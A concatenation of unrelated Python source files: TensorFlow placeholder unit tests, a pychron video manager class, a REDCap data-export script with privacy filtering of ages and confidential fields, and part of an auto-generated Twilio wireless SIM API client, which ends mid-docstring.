p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=(10, 10), name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testUnknownShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="p")
p_identity = array_ops.identity(p)
# can feed anything
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
feed_array = np.random.rand(4, 2, 5)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
def testScalarShape(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.float32, shape=[], name="p")
p_identity = array_ops.identity(p)
self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_v2(
dtypes_lib.float32, shape=[None, 3], name="p")
p_identity = array_ops.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={p: feed_array}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder_v2(dtypes_lib.int32, shape=[], name="p")
with ops.control_dependencies([p]):
c = constant_op.constant(5, dtypes_lib.int32)
d = math_ops.mul(p, c)
val = np.array(2).astype(np.int)
self.assertEqual(10, d.eval(feed_dict={p: val}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder_v2(dtypes_lib.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder_v2(dtypes_lib.float32, shape=None, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder_v2(dtypes_lib.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder_v2(
dtypes_lib.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(test.TestCase):
def testFullShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
a = array_ops.identity(p)
self.assertAllEqual([[2, 2], [2, 2]], a.eval())
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[6, 6, 6], [6, 6, 6]]})
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([1, 2, 3], shape=[None])
a = array_ops.identity(p)
self.assertAllEqual([1, 2, 3], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[2, 2], [2, 2]]})
def testNoShape(self):
with self.test_session():
p = array_ops.placeholder_with_default([17], shape=None)
a = array_ops.identity(p)
self.assertAllEqual([17], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
self.assertAllEqual(
[[3, 3], [3, 3]], a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
if __name__ == "__main__":
test.main()
|
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from __future__ import absolute_import
from traits.api import Instance, Float, Button, Int, Property, Event, Bool
from traitsui.api import View, Item, HGroup
# =============standard library imports ========================
from threading import Thread
# =============local library imports ==========================
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.image.video import Video
from pychron.image.image import Image
from .manager import Manager
from pychron.canvas.canvas2D.video_canvas import VideoCanvas
from pychron.core.helpers.filetools import unique_path
from pychron.paths import paths
class VideoManager(Manager):
"""
"""
video = Instance(Video, ())
image = Instance(Image, ())
process = Button
# pause = Button
record = Event
record_label = Property(depends_on='is_recording')
is_recording = Bool
# record_button = Button('Record')
threshold = Float(99, auto_set=False, enter_set=True)
angle = Float(0, auto_set=False, enter_set=True)
erosion = Int(0, auto_set=False, enter_set=True)
dilation = Int(0, auto_set=False, enter_set=True)
x = Int(0, auto_set=False, enter_set=True)
y = Int(0, auto_set=False, enter_set=True)
canvas = Instance(VideoCanvas)
width = Int(640)
height = Int(480)
def open_video(self, **kw):
self.video.open(**kw)
def close_video(self, **kw):
self.video.close(**kw)
def shutdown(self):
self.video.shutdown()
def _get_record_label(self):
return 'Record' if not self.is_recording else 'Stop'
# def _pause_fired(self):
# self.canvas.pause = not self.canvas.pause
def _record_fired(self):
def _rec_():
self.start_recording()
# time.sleep(4)
# self.stop_recording()
if self.is_recording:
self.is_recording = False
self.stop_recording()
else:
self.is_recording = True
t = Thread(target=_rec_)
t.start()
def start_recording(self, path=None, use_dialog=False):
'''
'''
self.info('start video recording ')
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
path, _ = unique_path(paths.video_dir,
'vm_recording',
extension='avi')
self.info('saving recording to path {}'.format(path))
# self.start()
self.video.start_recording(path)
# time.sleep(5)
# self.stop_recording()
def stop_recording(self):
'''
'''
self.info('stop video recording')
# self.stop()
self.video.stop_recording()
self.is_recording = False
def start(self, user=None):
'''
'''
self.info('opening video connection')
self.video.open(user=user)
def stop(self, user=None):
'''
'''
self.info('closing video connection')
self.video.close(user=user)
# def snapshot(self, identifier=None, path=None, root=None, crop=None):
# if path is None:
# if root is None:
# root = snapshot_dir
#
# base = 'frame'
# if identifier is not None:
# base = 'frame_{}_'.format(identifier)
#
#
# path, _cnt = unique_path(root=root, base=base, filetype='jpg')
#
# self.info('saving snapshot {}'.format(path))
# pychron = self.video.record_frame(path, crop=crop)
# return pychron, os.path.basename(path)
# if kind is not None:
# self.image = globals()['{}Image'.format(kind.capitalize())]()
# self.image.source_frame = pychron
# def find_polygons(self, path = None, crop = None):
# if path:
# frame = load_image(path, swap = True)
# if crop:
# icrop(*((frame,) + crop))
#
# self.image = CalibrationImage()
# self.image.source_frame = frame
#
# return self.image.find_polygons(thresh = self.threshold,
# erode_value = self.erosion,
# dilate_value = self.dilation)
# def find_lines(self, path = None, crop = None):
# if path:
# frame = load_image(path, swap = True)
# if crop:
# icrop(*((frame,) + crop))
#
# self.image = CalibrationImage()
# self.image.source_frame = frame
#
# return self.image.process(thresh = self.threshold,
# erode_value = self.erosion,
# dilate_value = self.dilation)
#
# def process_image(self, path = None, angle = None, thresh = None, crop = None, **kw):
# '''
# '''
# if path is None:
# if self.image is None:
# frame = self.video.get_frame(clone = True)
# else:
# frame = self.image.source_frame
# else:
# frame = load_image(path)
#
# if thresh is None:
# thresh = self.threshold
# if angle is None:
# angle = self.angle
#
# if self.image is None:
# self.image = TargetImage()
#
# if crop:
# icrop(*((frame,) + crop))
#
# self.image.source_frame = frame
#
# #self.load_image(path = path)
# target = self.image.process(thresh, angle, **kw)
#
# return target
def _canvas_default(self):
return VideoCanvas(video=self.video)
# def _video_default(self):
# '''
# '''
#
# return Video()
# def _image_default(self):
# '''
# '''
# return TargetImage()
# @on_trait_change('threshold,erosion,angle,dilation,x,y')
# def update(self):
# '''
# '''
# self.find_lines()
# # p = '/Users/fargo2/Desktop/laser_tray_75.tiff'
# av = self.process_image(#crop = (self.x, self.y, 250, 250),
# # erode = self.erosion,
# #dilate = self.dilation
# )
def traits_view(self):
v = View(
HGroup(
self._button_factory('record', 'record_label', align='right'),
# Item('pause')
),
Item('canvas', show_label=False,
resizable=False,
editor=VideoComponentEditor(width=self.width,
height=self.height)))
return v
#
# def image_view(self):
# '''
# '''
# control_grp = VGroup(Item('threshold', editor=RangeEditor(mode='slider',
# low=0,
# high=255)),
# # Item('angle', editor = RangeEditor(mode = 'slider',
# # low = 0,
# # high = 360)),
# Item('erosion', editor=RangeEditor(mode='spinner',
# low=0,
# high=4)),
# Item('dilation', editor=RangeEditor(mode='spinner',
# low=0,
# high=4)))
# # Item('x', editor = RangeEditor(mode = 'spinner',
# # low = 0,
# # high = 500)),
# # Item('y', editor = RangeEditor(mode = 'spinner',
# # low = 0,
# # high = 500)),)
# return View(
# VGroup(control_grp,
# Item('image', show_label=False,
# editor=ImageEditor())
# ),
# x=0.05,
# y=0.1,
# #386365
# width=1000,
# height=700,
# resizable=True,
# title=self.title
# )
if __name__ == '__main__':
from pychron.core.helpers.logger_setup import logging_setup
logging_setup('video')
vm = VideoManager()
# p = '/Users/fargo2/Desktop/laser_tray_50.tiff'
# vm.process_image(p, crop=(0, 0, 250, 250))
vm.start()
vm.configure_traits() # view='image_view')
# ================== EOF ========================
# def process_image_dir(self, root):
# '''
# @type root: C{str}
# @param root:
# '''
# A = 60
# t = 99
# results = []
# if os.path.isdir(root):
# files = os.listdir(root)
#
# for f in files:
# if not f.startswith('.'):
# path = os.path.join(root, f)
# self.title = f
#
# target = self.process_image(path, angle = A, thresh = t)
#
# results.append((f, target))
#
# return results
#
#
# # def load_image(self, path = None):
# # '''
# # @type path: C{str}
# # @param path:
# # '''
# # if path is None:
# # frame = load_image(path)
# # self.image.source_frame = frame
#
#
# def save_frame(self, name = None, frame = None, path = None, root = None):
# '''
# @type name: C{str}
# @param name:
#
# @type frame: C{str}
# @param frame:
#
# @type path: C{str}
# @param path:
#
# @type root: C{str}
# @param root:
# '''
# if path is None:
# pass
# if root is None:
# root = os.path.join(paths.data_dir, 'video')
# if frame is None:
# frame = self.video.get_frame()
#
#
# if name is not None:
# path = os.path.join(root, '%.jpg' % name)
#
# sp = save_image(frame, root, path = path)
# self.info('=====image located at %s======' % sp)
# return sp
#
# def accumulate_frames(self, setpoint, n, interval):
# '''
# @type setpoint: C{str}
# @param setpoint:
#
# @type n: C{str}
# @param n:
#
# @type interval: C{str}
# @param interval:
# '''
# for i in range(n):
# self.info('accumulating frame %i' % (i))
# frame = self.video.get_frame()
# self.save_frame(frame = frame, name = 'frame%i_%i' % (setpoint, i))
# time.sleep(interval)
# # #fi=self.video.get_frame()
# #
# # #dst=new_dst(fi)
# # for i in range(n-1):
# # self.info('accumulating frame %i'%(i))
# # f=self.video.get_frame()#gray=True)
# # #cvAcc(f,dst)
# # time.sleep(interval)
# #
# # return fi
#
# def _process_fired(self):
# '''
# '''
# f = self.accumulate_frames(5, 1)
# self.save_frame(frame = f, name = 'test')
# def process_frame(self,frame=None,path=None,type='temperature',**kw):
# self.logger.info('========= processing frame for %s =========='%type)
#
# if path is not None:
# #frame=cvLoadImage(path)
# frame=load_image(path)
#
# elif frame is None:
# frame=self.video.get_frame(clone=True,
# flag=CV_CVTIMG_SWAP_RB
# )
#
# self.image.frames.append(frame)
# a=self.image
#
# #locate the ROI
# self.logger.info('=========== locating target and selecting ROI =========')
# #a.locate_target()
#
# #calculate a temperature
# self.logger.info('============ calculating temperature from ROI =========')
# #avg= a.get_target_info()
#
#
# #self.edit_traits(view='image_view')
# return 10
# #return avg.val
# low_threshold=DelegatesTo('image')
# high_threshold=DelegatesTo('image')
#
# low_low=DelegatesTo('image')
# low_high=DelegatesTo('image')
#
# high_low=DelegatesTo('image')
# high_high=DelegatesTo('image')
# process=Button
# prev_ui=Any
#
#
# record_button=Event
# record_label=Property(depends_on='recording')
# recording=Bool
#
# snapshot=DelegatesTo('video')
# def process_view(self):
# return View(Item('low_threshold',editor=RangeEditor(low_name='low_low',
# high_name='low_high')),
# Item('high_threshold',editor=RangeEditor(low_name='high_low',
# high_name='high_high',
# mode='slider')),
# Item('image',show_label=False,
# editor=ImageEditor()),
# x=0.05,
# y=0.1,
# width=0.75,
# height=0.75,
# resizable=True,
# title='Snapshot View'
# )
# # def _snapshot_fired(self):
# # directory='/Users/Ross/Pychrondata/data/video'
# # self.video.record_frame(directory)
#
# def _record_button_fired(self):
# if not self.recording:
# self.logger.info('starting video record')
#
# self.video.start_recording()
# else:
# self.logger.info('stop video record')
#
# self.recording =not self.recording
#
# def _get_record_label(self):
# return 'RECORD' if not self.recording else 'STOP'
#
# def _high_threshold_changed(self):
# self.low_high=self.high_threshold
#
# def _set_center_fired(self):
# center=self.video.mouse_x,self.video.mouse_y
#
# #self.video.set_center()
# print center
#
# self.image.center=center
|
|
#!/usr/bin/env python
##
## Copyright 2016 SRI International
## See COPYING file distributed along with the package for the copyright and license terms.
##
import os
import re
import glob
import time
import filecmp
import pandas
# Truncate age to 2 digits for increased identity protection
def truncate_age(age_in):
match = re.match('([0-9]*\.[0-9]*)', str(age_in))
if match:
return round(float(match.group(1)), 2)
else:
return age_in
# "Safe" CSV export - this will catch IO errors from trying to write to a file
# that is currently being read and will retry a number of times before giving up
# This function will also confirm whether the newly created file is different
# from an already existing file of the same name. Only changed files will be
# updated.
def safe_csv_export(df, fname, verbose=False):
success = False
retries = 10
while (not success) and (retries > 0):
try:
df.to_csv(fname + '.new', index=False)
success = True
except IOError as e:
print "ERROR: failed to write file", fname, "with errno", e.errno
if e.errno == 11:
print "Retrying in 5s..."
time.sleep(5)
retries -= 1
else:
retries = 0
if success:
# Check if new file is equal to old file
if os.path.exists(fname) and filecmp.cmp(fname, fname + '.new',
shallow=False):
# Equal - remove new file
os.remove(fname + '.new')
else:
# Not equal or no old file: put new file in its final place
os.rename(fname + '.new', fname)
if verbose:
print "Updated", fname
# Export selected REDCap data to pipeline/distribution directory
def export(redcap_project, site, subject, event, subject_data, visit_age,
visit_data, arm_code, visit_code, subject_code, subject_datadir,
forms_this_event, select_exports=None, verbose=False):
# Mark subjects/visits that have QA completed by creating a hidden marker
# file
qafile_path = os.path.join(subject_datadir, '.qacomplete')
if visit_data['mri_qa_completed'] == '1':
try:
if not os.path.exists(qafile_path):
qafile = open(qafile_path, 'w')
qafile.close()
except:
print "ERROR: unable to open QA marker file in", subject_datadir
else:
try:
if os.path.exists(qafile_path):
os.remove(qafile_path)
except:
print "ERROR: unable to remove QA marker file", qafile_path
# Check if the "measures" subdirectory already exists - this is where all
# the csv files go. Create it if necessary.
measures_dir = os.path.join(subject_datadir, 'measures')
if not os.path.exists(measures_dir):
os.makedirs(measures_dir)
# Export demographics (if selected)
if not select_exports or 'demographics' in select_exports:
# Create "demographics" file "by hand" - this has some data not (yet)
# in REDCap.
# Latino and race coding arrives here as floating point numbers; make
# int strings from that (cannot use "int()" because it would fail for
# missing data
hispanic_code = re.sub('(.0)|(nan)', '', str(subject_data['hispanic']))
race_code = re.sub('(.0)|(nan)', '', str(subject_data['race']))
# scanner manufacturer map
mfg = dict(A='siemens', B='ge', C='ge', D='siemens', E='ge')
demographics = [
['subject', subject_code],
['arm', arm_code],
['visit', visit_code],
['site', site],
['sex', subject[8]],
['visit_age', truncate_age(visit_age)],
['mri_structural_age', truncate_age(visit_data['mri_t1_age'])],
['mri_diffusion_age', truncate_age(visit_data['mri_dti_age'])],
['mri_restingstate_age',
truncate_age(visit_data['mri_rsfmri_age'])],
['exceeds_bl_drinking',
'NY'[int(subject_data['enroll_exception___drinking'])]],
['siblings_enrolled_yn',
'NY'[int(subject_data['siblings_enrolled___true'])]],
['siblings_id_first', subject_data['siblings_id1']],
['hispanic', code_to_label_dict['hispanic'][hispanic_code][0:1]],
['race', race_code],
['race_label', code_to_label_dict['race'][race_code]],
['participant_id', subject],
['scanner', mfg[site]],
]
if race_code == '6':
# if other race is specified, mark race label with manually curated
# race code
demographics[14] = ('race_label', subject_data['race_other_code'])
series = pandas.Series()
for (key, value) in demographics:
series = series.set_value(key, value)
safe_csv_export(pandas.DataFrame(series).T,
os.path.join(measures_dir, 'demographics.csv'),
verbose=verbose)
# First get data for all fields across all forms in this event - this speeds
# up transfers over getting each form separately
all_fields = ['study_id']
export_list = []
for export_name in export_forms.keys():
if (import_forms[export_name] in forms_this_event) \
and (not select_exports or export_name in select_exports):
all_fields += [re.sub('___.*', '', field_name) for field_name in
export_forms[export_name]]
export_list.append(export_name)
all_records = redcap_project.export_records(fields=all_fields,
records=[subject],
events=[event],
format='df')
# Now go form by form and export data
for export_name in export_list:
# Remove the complete field from the list of forms
complete = '{}_complete'.format(import_forms.get(export_name))
fields = [column for column in export_forms.get(export_name)
if column != complete]
# Select data for this form - "reindex_axis" is necessary to put
# fields in listed order - REDCap returns them lexicographically sorted
record = all_records[fields].reindex_axis(fields, axis=1)
if len(record) == 1:
# First, add the three index columns
record.insert(0, 'subject', subject_code)
record.insert(1, 'arm', arm_code)
record.insert(2, 'visit', visit_code)
field_idx = 0
output_fields = []
for field in record.columns:
# Rename field for output if necessary
if field in export_rename[export_name].keys():
output_field = export_rename[export_name][field]
else:
output_field = field
output_fields.append(output_field)
# If this is an "age" field, truncate to 2 digits for privacy
if re.match('.*_age$', field):
record[field] = record[field].apply(truncate_age)
# If this is a radio or dropdown field
# (except "FORM_[missing_]why"), add a separate column for the
# coded label
if field in code_to_label_dict.keys() and not re.match(
'.*_why$', field):
code = str(record[field].ix[0])
label = ''
if code in code_to_label_dict[field].keys():
label = code_to_label_dict[field][code]
field_idx += 1
record.insert(field_idx, output_field + '_label', label)
output_fields.append(output_field + '_label')
field_idx += 1
# Apply renaming to columns
record.columns = output_fields
# Figure out path for CSV file and export this record
safe_csv_export(record,
os.path.join(measures_dir, export_name + '.csv'),
verbose=verbose)
# Filter potentially confidential fields out of given list, based on project
# metadata
def filter_out_confidential(field_list, metadata_dict):
filtered_list = []
for field_name in field_list:
try:
(field_type, field_validation, field_label, text_val_min,
text_val_max, choices) = metadata_dict[
re.sub('___.*', '', field_name)]
if (field_type != 'text' and field_type != 'notes') \
or (field_validation in ['number', 'integer', 'time']):
filtered_list.append(field_name)
else:
print "WARNING: field '%s' is of type '%s' with " \
"validation '%s' - excluding as potentially " \
"confidential." % (field_name,
field_type,
field_validation)
except:
if '_complete' in field_name:
filtered_list.append(field_name)
return filtered_list
# Filter confidential fields from all forms
metadata_dict = dict()
def filter_all_forms(redcap_metadata):
# First turn metadata into easily digested dict
for field in redcap_metadata:
field_tuple = (field['field_type'],
field['text_validation_type_or_show_slider_number'],
field['field_label'],
field['text_validation_min'],
field['text_validation_max'],
field['select_choices_or_calculations'])
metadata_dict[field['field_name']] = field_tuple
# Filter each form
for export_name in export_forms.keys():
export_forms[export_name] = filter_out_confidential(
export_forms[export_name], metadata_dict)
# Make lookup dicts for mapping radio/dropdown codes to labels
code_to_label_dict = dict()
def make_code_label_dict(redcap_metadata):
# First turn metadata into easily digested dict
for field in redcap_metadata:
if field['field_type'] in ['radio', 'dropdown']:
field_dict = {'': ''}
for choice in field['select_choices_or_calculations'].split('|'):
code_label = [c.strip() for c in choice.split(',')]
field_dict[code_label[0]] = ', '.join(code_label[1:])
code_to_label_dict[field['field_name']] = field_dict
# Organize REDCap metadata (data dictionary)
def organize_metadata(redcap_metadata):
filter_all_forms(redcap_metadata)
make_code_label_dict(redcap_metadata)
# Create data dictionaries in a user-provided directory
# The columns in a REDCap data dictionary (MUST be in this order!!)
# for each entry in the form list you have to define a variable
def create_datadicts_general(datadict_dir, datadict_base_file,
export_forms_list, variable_list):
redcap_datadict_columns = ["Variable / Field Name", "Form Name",
"Section Header", "Field Type", "Field Label",
"Choices, Calculations, OR Slider Labels",
"Field Note",
"Text Validation Type OR Show Slider Number",
"Text Validation Min", "Text Validation Max",
"Identifier?",
"Branching Logic (Show field only if...)",
"Required Field?", "Custom Alignment",
"Question Number (surveys only)",
"Matrix Group Name", "Matrix Ranking?"]
if not os.path.exists(datadict_dir):
os.makedirs(datadict_dir)
ddict = pandas.DataFrame(index=variable_list,
columns=redcap_datadict_columns)
for form_name, var in zip(export_forms_list, variable_list):
field_name = re.sub('___.*', '', var)
ddict["Variable / Field Name"][var] = field_name
ddict["Form Name"][var] = form_name
# Check if var is in data dict ('FORM_complete' fields are NOT)
if field_name in metadata_dict.keys():
ddict["Field Type"][var] = metadata_dict[field_name][0]
# need to transfer to utf-8 code otherwise can create problems when
# writing dictionary to file it just is a text field so it should
# not matter
ddict["Field Label"][var] = metadata_dict[field_name][2].encode(
'utf-8')
ddict["Text Validation Type OR Show Slider Number"][var] = \
metadata_dict[field_name][1]
ddict["Text Validation Min"][var] = metadata_dict[field_name][3]
ddict["Text Validation Max"][var] = metadata_dict[field_name][4]
# need to transfer to utf-8 code otherwise can create problems when
# writing dictionary to file it just is a choice field so it
# should not matter
ddict["Choices, Calculations, OR Slider Labels"][var] = \
metadata_dict[field_name][5].encode('utf-8')
# Finally, write the data dictionary to a CSV file
dicFileName = os.path.join(datadict_dir,
datadict_base_file + '_datadict.csv')
try:
ddict.to_csv(dicFileName, index=False)
except:
import sys
sys.exit(
"ERROR:create_datadicts: could not export dictionary %s: \n%s:%s" %
(dicFileName, sys.exc_info()[0].__doc__, sys.exc_info()[1]))
# defining entry_list only makes sense if export_forms_list only consists of one
# entry !
def create_datadicts(datadict_dir):
# Go over all exported forms
for export_name in export_forms.keys():
export_form_entry_list = export_forms[export_name]
size_entry_list = len(export_form_entry_list)
export_form_list = [export_name] * size_entry_list
create_datadicts_general(datadict_dir, export_name, export_form_list,
export_form_entry_list)
# Create custom form for demographics
export_form_entry_list = ['site', 'sex', 'visit_age', 'mri_structural_age',
'mri_diffusion_age', 'mri_restingstate_age',
'exceeds_bl_drinking', 'siblings_enrolled_yn',
'siblings_id_first', 'hispanic', 'race',
'race_label', 'participant_id', 'scanner']
# First two entries are extracted from SubjectID
export_form_list = ['basic_demographics', 'basic_demographics',
'basic_demographics', 'mri_report', 'mri_report',
'mri_report', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics', 'basic_demographics',
'basic_demographics']
create_datadicts_general(datadict_dir, 'demographics', export_form_list,
export_form_entry_list)
#
# Initialization - figure out which instruments we're supposed to export, and
# which fields
#
import_forms = dict()
export_forms = dict()
export_names = dict()
export_rename = dict()
exports_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'exports')
exports_files = glob.glob(os.path.join(exports_dir, '*.txt'))
for f in exports_files:
file = open(f, 'r')
contents = [line.strip() for line in file.readlines()]
file.close()
export_name = re.sub('\.txt$', '', os.path.basename(f))
import_form_name = re.sub('\n', '', contents[0])
import_forms[export_name] = import_form_name
export_forms[export_name] = [re.sub('\[.*\]', '', field) for field in
contents[1:]] + [
'%s_complete' % import_form_name]
export_rename[export_name] = dict()
for field in contents[1:]:
match = re.match('^(.+)\[(.+)\]$', field)
if match:
export_rename[export_name][match.group(1)] = match.group(2)
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.preview.wireless.sim.usage import UsageList
class SimList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the SimList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.sim.SimList
:rtype: twilio.rest.preview.wireless.sim.SimList
"""
super(SimList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Sims'.format(**self._solution)
def stream(self, status=values.unset, iccid=values.unset,
rate_plan=values.unset, e_id=values.unset,
sim_registration_code=values.unset, limit=None, page_size=None):
"""
Streams SimInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.sim.SimInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
status=status,
iccid=iccid,
rate_plan=rate_plan,
e_id=e_id,
sim_registration_code=sim_registration_code,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, status=values.unset, iccid=values.unset, rate_plan=values.unset,
e_id=values.unset, sim_registration_code=values.unset, limit=None,
page_size=None):
"""
Lists SimInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.sim.SimInstance]
"""
return list(self.stream(
status=status,
iccid=iccid,
rate_plan=rate_plan,
e_id=e_id,
sim_registration_code=sim_registration_code,
limit=limit,
page_size=page_size,
))
def page(self, status=values.unset, iccid=values.unset, rate_plan=values.unset,
e_id=values.unset, sim_registration_code=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SimInstance records from the API.
Request is executed immediately
:param unicode status: The status
:param unicode iccid: The iccid
:param unicode rate_plan: The rate_plan
:param unicode e_id: The e_id
:param unicode sim_registration_code: The sim_registration_code
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
params = values.of({
'Status': status,
'Iccid': iccid,
'RatePlan': rate_plan,
'EId': e_id,
'SimRegistrationCode': sim_registration_code,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SimPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SimInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SimPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SimContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
return SimContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a SimContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
return SimContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.SimList>'
class SimPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the SimPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.sim.SimPage
:rtype: twilio.rest.preview.wireless.sim.SimPage
"""
super(SimPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SimInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.sim.SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return SimInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.SimPage>'
class SimContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, sid):
"""
Initialize the SimContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.sim.SimContext
:rtype: twilio.rest.preview.wireless.sim.SimContext
"""
super(SimContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/Sims/{sid}'.format(**self._solution)
# Dependents
self._usage = None
def fetch(self):
"""
Fetch a SimInstance
:returns: Fetched SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return SimInstance(self._version, payload, sid=self._solution['sid'], )
def update(self, unique_name=values.unset, callback_method=values.unset,
callback_url=values.unset, friendly_name=values.unset,
rate_plan=values.unset, status=values.unset,
commands_callback_method=values.unset,
commands_callback_url=values.unset, sms_fallback_method=values.unset,
sms_fallback_url=values.unset, sms_method=values.unset,
sms_url=values.unset, voice_fallback_method=values.unset,
voice_fallback_url=values.unset, voice_method=values.unset,
voice_url=values.unset):
"""
Update the SimInstance
:param unicode unique_name: The unique_name
